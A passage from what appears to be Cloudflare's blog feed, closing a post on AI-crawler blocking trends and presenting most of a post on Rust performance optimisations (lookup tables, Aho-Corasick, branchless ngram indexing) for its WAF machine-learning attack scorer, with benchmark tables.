daily with this new rule. Additionally, we’re excited to announce that support for configuring AI bots protection via Terraform will be available by the end of this year, providing even more flexibility and control for managing your bot protection settings.</p>
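<p>As a toy sketch of what a single-attribute heuristic can look like in its simplest form, consider matching on self-declared user agents. The token list below is illustrative only; the production rule set is far larger and does not rely on user-agent strings alone:</p>

```rust
// Toy single-attribute heuristic: flag requests whose user agent declares
// a known AI crawler. The token list is illustrative, not the production set.
fn is_declared_ai_bot(user_agent: &str) -> bool {
    const AI_BOT_TOKENS: [&str; 3] = ["GPTBot", "Bytespider", "CCBot"];
    AI_BOT_TOKENS.iter().any(|token| user_agent.contains(token))
}

fn main() {
    assert!(is_declared_ai_bot(
        "Mozilla/5.0 (compatible; Bytespider; https://bytedance.com)"
    ));
    assert!(!is_declared_ai_bot(
        "Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
    ));
    println!("ok");
}
```

<p>Heuristics like this only catch bots that announce themselves, which is why they complement, rather than replace, the ML model.</p>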
    <div>
      <h3>Bot behavior</h3>
      <a href="#bot-behavior">
        
      </a>
    </div>
    <p>With the enhancements to our detection capabilities, it is essential to assess the impact of these changes on bot activity across the Internet. Since the launch of the updated AI bots block button, we have been closely monitoring for any shifts in bot activity and adaptation strategies. The most basic fingerprinting technique we use to identify AI bots is looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who it is when crawling a website. </p><p>The graph below shows the volume of traffic we label as AI bots over the past two months. The blue line indicates the daily request count, while the red line represents the monthly average number of requests. In the past two months, we have seen an average reduction of nearly 30 million requests, with a decrease of 40 million in the most recent month. This decline coincides with the release of Button v1 and Button v2. Our hypothesis is that with the new AI bots blocking feature, Cloudflare is blocking a majority of these bots, which is discouraging them from crawling. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/23ULxmxBIRskEONlWVIvlA/1dbd3d03239047492c2d4f7307217d97/BLOG-2564_7.jpg" />
          </figure><p>This hypothesis is supported by the observed decline in requests from several top AI crawlers. Specifically, the Bytespider bot reduced its daily requests from approximately 100 million to just 50 million between the end of June and the end of August (see graph below). This reduction could be attributed to several factors, including our new AI bots block button and changes in the crawler's strategy.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5UwtyZSXULrVzIqLcICGKd/fdf02c15d17e1d7ed248ba5f8a97eb54/BLOG-2564_8.jpg" />
          </figure><p>We have also observed an increase in the accountability of some AI crawlers. These crawlers are now more frequently declaring themselves via their user agents, reflecting a shift towards more transparent and responsible behavior. Notably, there has been a dramatic surge in the number of requests from the Perplexity user agent. This increase might be linked to <a href="https://rknight.me/blog/perplexity-ai-is-lying-about-its-user-agent/">previous accusations</a> that Perplexity did not properly present its user agent, which could have prompted a shift in their approach to ensure better identification and compliance. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Hq2vUMqqdNCyaxNTCg3JD/610ad53d57203203c5176229245c8086/BLOG-2564_9.jpg" />
          </figure><p>These trends suggest that our updates are likely affecting how AI crawlers interact with content. We will continue to monitor AI bot activity to help users control who accesses their content and how. By keeping a close watch on emerging patterns, we aim to provide users with the tools and insights needed to make informed decisions about managing their traffic. </p>
    <div>
      <h2>Wrap up</h2>
      <a href="#wrap-up">
        
      </a>
    </div>
    <p>We’re excited to continue to explore the AI landscape, whether we’re finding more ways to make the Cloudflare dashboard usable or new threats to guard against. Our AI insights on Radar update in near real-time, so please join us in watching as new trends emerge and discussing them in the <a href="https://community.cloudflare.com/"><u>Cloudflare Community</u></a>. </p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Generative AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6HqKUMoXg0wFIQg9howLMX</guid>
            <dc:creator>Adam Martinetti</dc:creator>
            <dc:creator>Harsh Saxena</dc:creator>
            <dc:creator>Gauri Baraskar</dc:creator>
            <dc:creator>Carlos Azevedo</dc:creator>
            <dc:creator>David Belson</dc:creator>
        </item>
        <item>
            <title><![CDATA[Making WAF ML models go brrr: saving decades of processing time]]></title>
            <link>https://blog.cloudflare.com/making-waf-ai-models-go-brr/</link>
            <pubDate>Thu, 25 Jul 2024 13:00:46 GMT</pubDate>
            <description><![CDATA[ In this post, we discuss performance optimizations we've implemented for our WAF ML product. We'll guide you through code examples, benchmarks, and we'll share the impressive latency reduction numbers ]]></description>
            <content:encoded><![CDATA[ <p>We made our WAF Machine Learning models <b>5.5x</b> faster, reducing execution time by approximately <b>82%</b>, from <b>1519</b> to <b>275</b> microseconds! Read on to find out how we achieved this remarkable improvement.</p><p><a href="https://developers.cloudflare.com/waf/about/waf-attack-score/">WAF Attack Score</a> is Cloudflare's machine learning (ML)-powered layer built on top of our <a href="https://developers.cloudflare.com/waf/">Web Application Firewall (WAF)</a>. Its goal is to complement the WAF and detect attack bypasses that we haven't encountered before. This has proven invaluable in <a href="/detecting-zero-days-before-zero-day">catching zero-day vulnerabilities</a>, like the one detected in <a href="/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability">Ivanti Connect Secure</a>, before they are publicly disclosed and enhancing our customers' protection against emerging and unknown threats.</p><p>Since its <a href="/waf-ml">launch in 2022</a>, WAF attack score adoption has grown exponentially, now protecting millions of Internet properties and running real-time inference on tens of millions of requests per second. The feature's popularity has driven us to seek performance improvements, enabling even broader customer use and enhancing Internet security.</p><p>In this post, we will discuss the performance optimizations we've implemented for our WAF ML product. We'll guide you through specific code examples and benchmark numbers, demonstrating how these enhancements have significantly improved our system's efficiency. Additionally, we'll share the impressive latency reduction numbers observed after the rollout.</p><p>Before diving into the optimizations, let's take a moment to review the inner workings of the WAF Attack Score, which powers our WAF ML product.</p>
    <div>
      <h2>WAF Attack Score system design</h2>
      <a href="#waf-attack-score-system-design">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Bis9LE38A3aK4k7HEn7k9/44ae7b31096471a5256961715f8c7991/unnamed--4--6.png" />
            
            </figure><p>Cloudflare's WAF attack score identifies various traffic types and attack vectors (<a href="https://www.cloudflare.com/learning/security/threats/how-to-prevent-sql-injection/">SQLi</a>, <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, Command Injection, etc.) based on structural or statistical content properties. Here's how it works during inference:</p><ol><li><p><b>HTTP Request Content</b>: Start with raw HTTP input.</p></li><li><p><b>Normalization &amp; Transformation</b>: Standardize and clean the data, applying normalization, content substitutions, and de-duplication.</p></li><li><p><b>Feature Extraction</b>: Tokenize the transformed content to generate statistical and structural data.</p></li><li><p><b>Machine Learning Model Inference</b>: Analyze the extracted features with pre-trained models, mapping content representations to classes (e.g., XSS, SQLi or <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">RCE</a>) or scores.</p></li><li><p><b>Classification Output in WAF</b>: Assign a score to the input, ranging from 1 (likely malicious) to 99 (likely clean), guiding security actions.</p></li></ol>
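<p>The five stages above can be sketched end to end as follows. Every function body here is a stand-in invented for illustration, not Cloudflare's implementation:</p>

```rust
// Toy end-to-end sketch of the five pipeline stages described above.

fn normalize(raw: &str) -> String {
    // Stage 2: standardize and clean the content (here: just lowercase it).
    raw.to_lowercase()
}

fn extract_features(content: &str) -> Vec<f32> {
    // Stage 3: tokenize into a feature tensor (here: one crude length feature).
    vec![content.len() as f32]
}

fn infer(features: &[f32]) -> f32 {
    // Stage 4: model inference; a real system applies trained weights.
    1.0 / (1.0 + features[0] / 100.0)
}

fn attack_score(raw: &str) -> u8 {
    // Stage 5: map the model output onto the 1 (malicious) .. 99 (clean) range.
    let p_clean = infer(&extract_features(&normalize(raw)));
    (1.0 + p_clean * 98.0).round() as u8
}

fn main() {
    let s = attack_score("GET /?q=' OR 1=1--");
    assert!((1..=99).contains(&s));
    println!("score = {s}");
}
```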
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZzHRYXU27VYB5F3F3QjXf/9e5248610a1e89ac8c73a446925abb69/cfce15fb-ce84-4489-a05a-6872b9e502b8.png" />
            
            </figure><p>Next, we will explore feature extraction and inference optimizations.</p>
    <div>
      <h2>Feature extraction optimizations</h2>
      <a href="#feature-extraction-optimizations">
        
      </a>
    </div>
    <p>In the context of the WAF Attack Score ML model, feature extraction or pre-processing is essentially a process of tokenizing the given input and producing a float tensor of 1 x m size:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7DIxHJ5zLkdeknndiNGbk0/e802888a2212ddfcae688f1c4201587f/8cc41311-3a09-4c39-b47c-9dc449760ee2.png" />
            
            </figure><p>In our initial pre-processing implementation, this is achieved via a sliding window of 3 bytes over the input with the help of Rust’s <a href="https://doc.rust-lang.org/std/collections/struct.HashMap.html">std::collections::HashMap</a> to look up the tensor index for a given ngram.</p>
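<p>In miniature, that sliding-window lookup can be sketched as below, using a toy two-entry vocabulary in place of the real NORM_VOCAB, which holds thousands of ngrams:</p>

```rust
use std::collections::HashMap;

// Slide a 3-byte window over the input and count vocabulary hits at the
// corresponding tensor positions (a toy version of the real pre-processing).
fn populate_ngrams(tensor: &mut [f32], input: &[u8], vocab: &HashMap<&[u8], usize>) {
    for ngram in input.windows(3) {
        if let Some(&pos) = vocab.get(ngram) {
            tensor[pos] += 1.0;
        }
    }
}

fn main() {
    let vocab: HashMap<&[u8], usize> =
        HashMap::from([(b"abc".as_slice(), 0), (b"bca".as_slice(), 1)]);
    let mut tensor = [0.0f32; 2];
    populate_ngrams(&mut tensor, b"abcabc", &vocab);
    // Windows of "abcabc": abc, bca, cab, abc -> "abc" twice, "bca" once.
    assert_eq!(tensor, [2.0, 1.0]);
    println!("{tensor:?}");
}
```

<p>Each input byte lands in up to three windows, so the number of lookups grows linearly with input length.</p>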
    <div>
      <h3>Initial benchmarks</h3>
      <a href="#initial-benchmarks">
        
      </a>
    </div>
    <p>To establish performance baselines, we've set up four benchmark cases representing example inputs of various lengths, ranging from 44 to 9482 bytes. Each case exemplifies typical input sizes, including those for a request body, user agent, and URI. We run benchmarks using the <a href="https://bheisler.github.io/criterion.rs/book/getting_started.html">Criterion.rs</a> statistics-driven micro-benchmarking tool:</p>
            <pre><code>RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion</code></pre>
            <p>Here are initial numbers for these benchmarks executed on a Linux laptop with a 13th Gen Intel® Core™ i7-13800H processor:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Pre-processing time, μs</span></th>
    <th><span>Throughput, MiB/s</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>36.40</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td><span>33.83</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>28.94</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>30.24</span></td>
  </tr>
</tbody></table><p>An important observation from these results is that pre-processing time correlates with the length of the input string, with throughput ranging from 28 MiB/s to 36 MiB/s. This suggests that considerable time is spent iterating over longer input strings, making that iteration a key target for optimization. To validate this, let's examine where the processing time is spent by analyzing flamegraphs created from a 100-second profiling session, visualized using <a href="https://www.honeycomb.io/blog/golang-observability-using-the-new-pprof-web-ui-to-debug-memory-usage">pprof</a>:</p>
            <pre><code>RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion -- --profile-time 100
 
go tool pprof -http=: target/criterion/profile/preprocessing/avg-body-1000/profile.pb</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/WGhFT3j6vn4QGFOmdyNGO/8dd1c6e4d171cd2c407af7bf4d9a9ac7/unnamed--5--6.png" />
            
            </figure><p>Looking at the pre-processing flamegraph above, it's clear that most of the time was spent on the following two operations:</p>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>std::collections::hash::map::HashMap&lt;K,V,S&gt;::get</span></td>
    <td><span>61.8%</span></td>
  </tr>
  <tr>
    <td><span>regex::regex::bytes::Regex::replace_all</span></td>
    <td><span>18.5%</span></td>
  </tr>
</tbody></table><p>Let's tackle the HashMap lookups first. The lookups happen inside the <i>tensor_populate_ngrams</i> function, where the input is split into windows of 3 bytes, each representing an ngram, which is then looked up in two hash maps:</p>
            <pre><code>fn tensor_populate_ngrams(tensor: &amp;mut [f32], input: &amp;[u8]) {   
   // Populate the NORM ngrams
   let mut unknown_norm_ngrams = 0;
   let norm_offset = 1;
 
   for s in input.windows(3) {
       match NORM_VOCAB.get(s) {
           Some(pos) =&gt; {
               tensor[*pos as usize + norm_offset] += 1.0f32;
           }
           None =&gt; {
               unknown_norm_ngrams += 1;
           }
       };
   }
 
   // Populate the SIG ngrams
   let mut unknown_sig_ngrams = 0;
   let sig_offset = norm_offset + NORM_VOCAB.len();
 
   let res = SIG_REGEX.replace_all(&amp;input, b"#");
 
   for s in res.windows(3) {
       match SIG_VOCAB.get(s) {
           Some(pos) =&gt; {
               // adding +1 here as the first position will be the unknown_sig_ngrams
               tensor[*pos as usize + sig_offset + 1] += 1.0f32;
           }
           None =&gt; {
               unknown_sig_ngrams += 1;
           }
       }
   }
}</code></pre>
            <p>So essentially the pre-processing function performs a ton of hash map lookups, the volume of which depends on the size of the input string, e.g. 1469 lookups for the given benchmark case <i>avg-body-1000</i>.</p>
    <div>
      <h3>Optimization attempt #1: HashMap → Aho-Corasick</h3>
      <a href="#optimization-attempt-1-hashmap-aho-corasick">
        
      </a>
    </div>
    <p>Rust hash maps are generally quite fast. However, when that many lookups are being performed, it's not very cache friendly.</p><p>So can we do better than hash maps, and what should we try first? The answer is the <a href="https://docs.rs/aho-corasick/latest/aho_corasick/">Aho-Corasick library</a>.</p><p>This library provides multiple pattern search principally through an implementation of the <a href="https://en.wikipedia.org/wiki/Aho%E2%80%93Corasick_algorithm">Aho-Corasick algorithm</a>, which builds a fast finite state machine for executing searches in linear time.</p><p>We can also tune Aho-Corasick settings based on this recommendation:</p><blockquote><p><i>“You might want to use</i> <a href="https://docs.rs/aho-corasick/1.1.3/aho_corasick/struct.AhoCorasickBuilder.html#method.kind"><i>AhoCorasickBuilder::kind</i></a> <i>to set your searcher to always use</i> <a href="https://docs.rs/aho-corasick/1.1.3/aho_corasick/enum.AhoCorasickKind.html#variant.DFA"><i>AhoCorasickKind::DFA</i></a> <i>if search speed is critical and memory usage isn’t a concern.”</i></p></blockquote>
            <pre><code>static ref NORM_VOCAB_AC: AhoCorasick = AhoCorasick::builder().kind(Some(AhoCorasickKind::DFA)).build(&amp;[    
    "abc",
    "def",
    "wuq",
    "ijf",
    "iru",
    "piw",
    "mjw",
    "isn",
    "od ",
    "pro",
    ...
]).unwrap();</code></pre>
            <p>Then we use the constructed AhoCorasick dictionary to lookup ngrams using its <a href="https://docs.rs/aho-corasick/latest/aho_corasick/struct.AhoCorasick.html#method.find_overlapping_iter">find_overlapping_iter</a> method:</p>
            <pre><code>for mat in NORM_VOCAB_AC.find_overlapping_iter(&amp;input) {
    tensor_input_data[mat.pattern().as_usize() + 1] += 1.0;
}</code></pre>
            <p>We ran benchmarks and compared them against the baseline times shown above:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Aho-Corasick time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>129.59</span></td>
    <td><span>-47.84% or 1.64x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>16.47</span></td>
    <td><span>-41.56% or 1.71x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>1.01</span></td>
    <td><span>-30.38% or 1.44x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>1.90</span></td>
    <td><span>-33.60% or 1.51x</span></td>
  </tr>
</tbody></table><p>That's substantially better – Aho-Corasick DFA does wonders.</p>
    <div>
      <h3>Optimization attempt #2: Aho-Corasick → match</h3>
      <a href="#optimization-attempt-2-aho-corasick-match">
        
      </a>
    </div>
    <p>One would think the Aho-Corasick DFA optimization is enough, and that it's unlikely anything else can beat it. Yet we can throw Aho-Corasick away, simply use the Rust match statement, and let the compiler do the optimization for us!</p>
            <pre><code>#[inline]
const fn norm_vocab_lookup(ngram: &amp;[u8; 3]) -&gt; usize {     
    match ngram {
        b"abc" =&gt; 1,
        b"def" =&gt; 2,
        b"wuq" =&gt; 3,
        b"ijf" =&gt; 4,
        b"iru" =&gt; 5,
        b"piw" =&gt; 6,
        b"mjw" =&gt; 7,
        b"isn" =&gt; 8,
        b"od " =&gt; 9,
        b"pro" =&gt; 10,
        ...
        _ =&gt; 0,
    }
}</code></pre>
            <p>Here's how it performs in practice, based on the assembly generated by the <a href="https://godbolt.org/z/dqTq5n5Y3">Godbolt compiler explorer</a>. The corresponding assembly code efficiently implements this lookup by employing a jump table and byte-wise comparisons to determine the return value based on input sequences, optimizing for quick decisions and minimal branching. Although the example only includes ten ngrams, it's important to note that in applications like our WAF Attack Score ML models, we deal with thousands of ngrams. This simple match-based approach outshines both HashMap lookups and the Aho-Corasick method.</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Match time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td>	<span>112.96</span></td>
    <td><span>-54.54% or 2.20x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>13.12</span></td>
    <td><span>-53.45% or 2.15x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>0.75</span></td>
    <td><span>-48.37% or 1.94x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>1.41</span></td>
    <td><span>-50.91% or 2.04x</span></td>
  </tr>
</tbody></table><p>Switching to match gave us another 7-18% drop in latency, depending on the case.</p>
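<p>For reference, the match-based lookup compiles and runs as a self-contained toy with a three-entry vocabulary (the real table holds thousands of ngrams):</p>

```rust
// Toy version of the match-based ngram lookup; 0 means "unknown ngram".
const fn norm_vocab_lookup(ngram: &[u8; 3]) -> usize {
    match ngram {
        b"abc" => 1,
        b"def" => 2,
        b"wuq" => 3,
        _ => 0,
    }
}

fn main() {
    // Known ngrams map to their tensor positions, unknown ones to 0.
    assert_eq!(norm_vocab_lookup(b"abc"), 1);
    assert_eq!(norm_vocab_lookup(b"zzz"), 0);
    // Being `const`, the table can also be consulted at compile time.
    const IDX: usize = norm_vocab_lookup(b"def");
    assert_eq!(IDX, 2);
    println!("ok");
}
```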
    <div>
      <h3>Optimization attempt #3: Regex → WindowedReplacer</h3>
      <a href="#optimization-attempt-3-regex-windowedreplacer">
        
      </a>
    </div>
    <p>So, what exactly is the purpose of <i>Regex::replace_all</i> in pre-processing? Regex is defined and used like this:</p>
            <pre><code>pub static SIG_REGEX: Lazy&lt;Regex&gt; =
    Lazy::new(|| RegexBuilder::new("[a-z]+").unicode(false).build().unwrap());
    ... 
    let res = SIG_REGEX.replace_all(&amp;input, b"#");
    for s in res.windows(3) {
        tensor[sig_vocab_lookup(s.try_into().unwrap())] += 1.0;
    }</code></pre>
            <p>Essentially, all we need is to:</p><ol><li><p>Replace every sequence of lowercase letters in the input with a single byte "#".</p></li><li><p>Iterate over replaced bytes in a windowed fashion with a step of 3 bytes representing an ngram.</p></li><li><p>Look up the ngram index and increment it in the tensor.</p></li></ol><p>This logic seems simple enough that we could implement it more efficiently with a single pass over the input and without any allocations:</p>
            <pre><code>type Window = [u8; 3];
type Iter&lt;'a&gt; = Peekable&lt;std::slice::Iter&lt;'a, u8&gt;&gt;;

pub struct WindowedReplacer&lt;'a&gt; {
    window: Window,
    input_iter: Iter&lt;'a&gt;,
}

#[inline]
fn is_replaceable(byte: u8) -&gt; bool {
    matches!(byte, b'a'..=b'z')
}

#[inline]
fn next_byte(iter: &amp;mut Iter) -&gt; Option&lt;u8&gt; {
    let byte = iter.next().copied()?;
    if is_replaceable(byte) {
        while iter.next_if(|b| is_replaceable(**b)).is_some() {}
        Some(b'#')
    } else {
        Some(byte)
    }
}

impl&lt;'a&gt; WindowedReplacer&lt;'a&gt; {
    pub fn new(input: &amp;'a [u8]) -&gt; Option&lt;Self&gt; {
        let mut window: Window = Default::default();
        let mut iter = input.iter().peekable();
        for byte in window.iter_mut().skip(1) {
            *byte = next_byte(&amp;mut iter)?;
        }
        Some(WindowedReplacer {
            window,
            input_iter: iter,
        })
    }
}

impl&lt;'a&gt; Iterator for WindowedReplacer&lt;'a&gt; {
    type Item = Window;

    #[inline]
    fn next(&amp;mut self) -&gt; Option&lt;Self::Item&gt; {
        for i in 0..2 {
            self.window[i] = self.window[i + 1];
        }
        let byte = next_byte(&amp;mut self.input_iter)?;
        self.window[2] = byte;
        Some(self.window)
    }
}</code></pre>
            <p>By utilizing the <i>WindowedReplacer</i>, we simplify the replacement logic:</p>
            <pre><code>if let Some(replacer) = WindowedReplacer::new(&amp;input) {                
    for ngram in replacer {
        tensor[sig_vocab_lookup(&amp;ngram)] += 1.0;
    }
}</code></pre>
            <p>This new approach not only eliminates the need for allocating additional buffers to store replaced content, but also leverages Rust's iterator optimizations, which the compiler can more effectively optimize. You can view an example of the assembly output for this new iterator at the provided <a href="https://godbolt.org/z/fjaoP7z6Y">Godbolt link</a>.</p><p>Now let's benchmark this and compare against the original implementation:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Match time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td>	<span>51.00</span></td>
    <td><span>-79.47% or 4.87x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>5.53</span></td>
    <td><span>-80.36% or 5.09x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>0.40</span></td>
    <td><span>-72.11% or 3.59x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>0.69</span></td>
    <td><span>-76.07% or 4.18x</span></td>
  </tr>
</tbody></table><p>The new letter-replacement implementation has doubled the preprocessing speed compared to the previously optimized match-statement version, and it is four to five times faster than the original version!</p>
    <div>
      <h3>Optimization attempt #4: Going nuclear with branchless ngram lookups</h3>
      <a href="#optimization-attempt-4-going-nuclear-with-branchless-ngram-lookups">
        
      </a>
    </div>
    <p>At this point, a 4-5x improvement might seem like a lot, and pursuing further optimizations might seem pointless. After all, the ngram lookup using a match statement has beaten the following methods (benchmarks omitted for brevity):</p>
<table><thead>
  <tr>
    <th><span>Lookup method</span></th>
    <th><span>Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><a href="https://doc.rust-lang.org/std/collections/struct.HashMap.html"><span>std::collections::HashMap</span></a></td>
    <td><span>Uses </span><a href="https://github.com/rust-lang/hashbrown"><span>Google’s SwissTable</span></a><span> design with SIMD lookups to scan multiple hash entries in parallel. </span></td>
  </tr>
  <tr>
    <td><a href="https://docs.rs/aho-corasick/latest/aho_corasick/#"><span>Aho-Corasick</span></a><span> matcher with and without </span><a href="https://docs.rs/aho-corasick/latest/aho_corasick/dfa/struct.DFA.html"><span>DFA</span></a></td>
    <td><span>Also utilizes SIMD instructions in some cases.</span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/phf"><span>phf crate</span></a><span> </span></td>
    <td><span>A library to generate efficient lookup tables at compile time using </span><a href="https://en.wikipedia.org/wiki/Perfect_hash_function"><span>perfect hash functions</span></a><span>.</span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/ph"><span>ph crate</span></a></td>
    <td><span>Another Rust library of data structures based on perfect hashing. </span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/quickphf"><span>quickphf crate</span></a></td>
    <td><span>A Rust crate that allows you to use static compile-time generated hash maps and hash sets using </span><a href="https://arxiv.org/abs/2104.10402"><span>PTHash perfect hash functions</span></a><span>.</span></td>
  </tr>
</tbody></table><p>However, if we look again at <a href="https://godbolt.org/z/dqTq5n5Y3">the assembly of the norm_vocab_lookup function</a>, it is clear that the execution flow has to perform a bunch of comparisons using <i>cmp</i> instructions. This creates many branches for the CPU to handle, which can lead to branch mispredictions. Branch mispredictions occur when the CPU incorrectly guesses the path of execution, causing delays as it discards partially completed instructions and fetches the correct ones. By reducing or eliminating these branches, we can avoid these mispredictions and improve the efficiency of the lookup process. How can we get rid of those branches when there is a need to look up thousands of unique ngrams?</p><p>Since there are only 3 bytes in each ngram, we can build two lookup tables of 256 x 256 x 256 size, storing the ngram tensor index. With this naive approach, our memory requirements will be: 256 x 256 x 256 x 2 x 2 = 64 MB, which seems like a lot.</p><p>However, given that we only care about ASCII bytes 0..127, then memory requirements can be lower: 128 x 128 x 128 x 2 x 2 = 8 MB, which is better. However, we will need to check for bytes &gt;= 128, which will introduce a branch again.</p><p>So can we do better? Considering that the actual number of distinct byte values used in the ngrams is significantly less than the total possible 256 values, we can reduce memory requirements further by employing the following technique:</p><p>1. To avoid the branching caused by comparisons, we use precomputed offset lookup tables. This means instead of comparing each byte of the ngram during each lookup, we precompute the positions of each possible byte in a lookup table. This way, we replace the comparison operations with direct memory accesses, which are much faster and do not involve branching. We build an ngram bytes offsets lookup const array, storing each unique ngram byte offset position multiplied by the number of unique ngram bytes:</p>
            <pre><code>const NGRAM_OFFSETS: [[u32; 256]; 3] = [
    [
        // offsets of first byte in ngram
    ],
    [
        // offsets of second byte in ngram
    ],
    [
        // offsets of third byte in ngram
    ],
];</code></pre>
            <p>2. Then to obtain the ngram index, we can use this simple const function:</p>
            <pre><code>#[inline]
const fn ngram_index(ngram: [u8; 3]) -&gt; usize {
    (NGRAM_OFFSETS[0][ngram[0] as usize]
        + NGRAM_OFFSETS[1][ngram[1] as usize]
        + NGRAM_OFFSETS[2][ngram[2] as usize]) as usize
}</code></pre>
            <p>3. To look up the tensor index based on the ngram index, we construct another const array at compile time using a list of all ngrams, where N is the number of unique ngram bytes:</p>
            <pre><code>const NGRAM_TENSOR_IDX: [u16; N * N * N] = {
    let mut arr = [0; N * N * N];
    arr[ngram_index(*b"abc")] = 1;
    arr[ngram_index(*b"def")] = 2;
    arr[ngram_index(*b"wuq")] = 3;
    arr[ngram_index(*b"ijf")] = 4;
    arr[ngram_index(*b"iru")] = 5;
    arr[ngram_index(*b"piw")] = 6;
    arr[ngram_index(*b"mjw")] = 7;
    arr[ngram_index(*b"isn")] = 8;
    arr[ngram_index(*b"od ")] = 9;
    ...
    arr
};</code></pre>
            <p>4. Finally, to update the tensor for a given ngram, we look up the ngram index, then the tensor index, and then increment it with the help of <a href="https://doc.rust-lang.org/std/primitive.slice.html#method.get_unchecked_mut">get_unchecked_mut</a>, which avoids bounds checks that are unnecessary in this case and eliminates another source of branching:</p>
            <pre><code>#[inline]
fn update_tensor_with_ngram(tensor: &amp;mut [f32], ngram: [u8; 3]) {
    let ngram_idx = ngram_index(ngram);
    debug_assert!(ngram_idx &lt; NGRAM_TENSOR_IDX.len());
    unsafe {
        let tensor_idx = *NGRAM_TENSOR_IDX.get_unchecked(ngram_idx) as usize;
        debug_assert!(tensor_idx &lt; tensor.len());
        *tensor.get_unchecked_mut(tensor_idx) += 1.0;
    }
}</code></pre>
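<p>To make the indexing scheme concrete, here is a minimal, self-contained sketch of it, assuming a tiny hypothetical ngram set. The production tables are precomputed as const arrays at compile time; this toy builds them at runtime for clarity. Each distinct byte gets a rank, and the three ranks are combined base-N, so distinct ngrams always map to distinct indices without a single comparison at lookup time:</p>

```rust
// Toy version of the branchless ngram indexing scheme. The ngram set
// here is hypothetical; the real tables are built at compile time.
fn build_offsets(ngrams: &[[u8; 3]]) -> ([[u32; 256]; 3], usize) {
    let mut rank = [0u32; 256];
    let mut seen = [false; 256];
    let mut n = 0usize; // number of distinct bytes seen in the ngrams
    for ng in ngrams {
        for &b in ng {
            if !seen[b as usize] {
                seen[b as usize] = true;
                rank[b as usize] = n as u32;
                n += 1;
            }
        }
    }
    // Position-dependent multipliers turn the three ranks into a unique
    // base-n index, so lookups need no comparisons at all.
    let mut offsets = [[0u32; 256]; 3];
    for b in 0..256 {
        offsets[0][b] = rank[b] * (n as u32) * (n as u32);
        offsets[1][b] = rank[b] * (n as u32);
        offsets[2][b] = rank[b];
    }
    (offsets, n)
}

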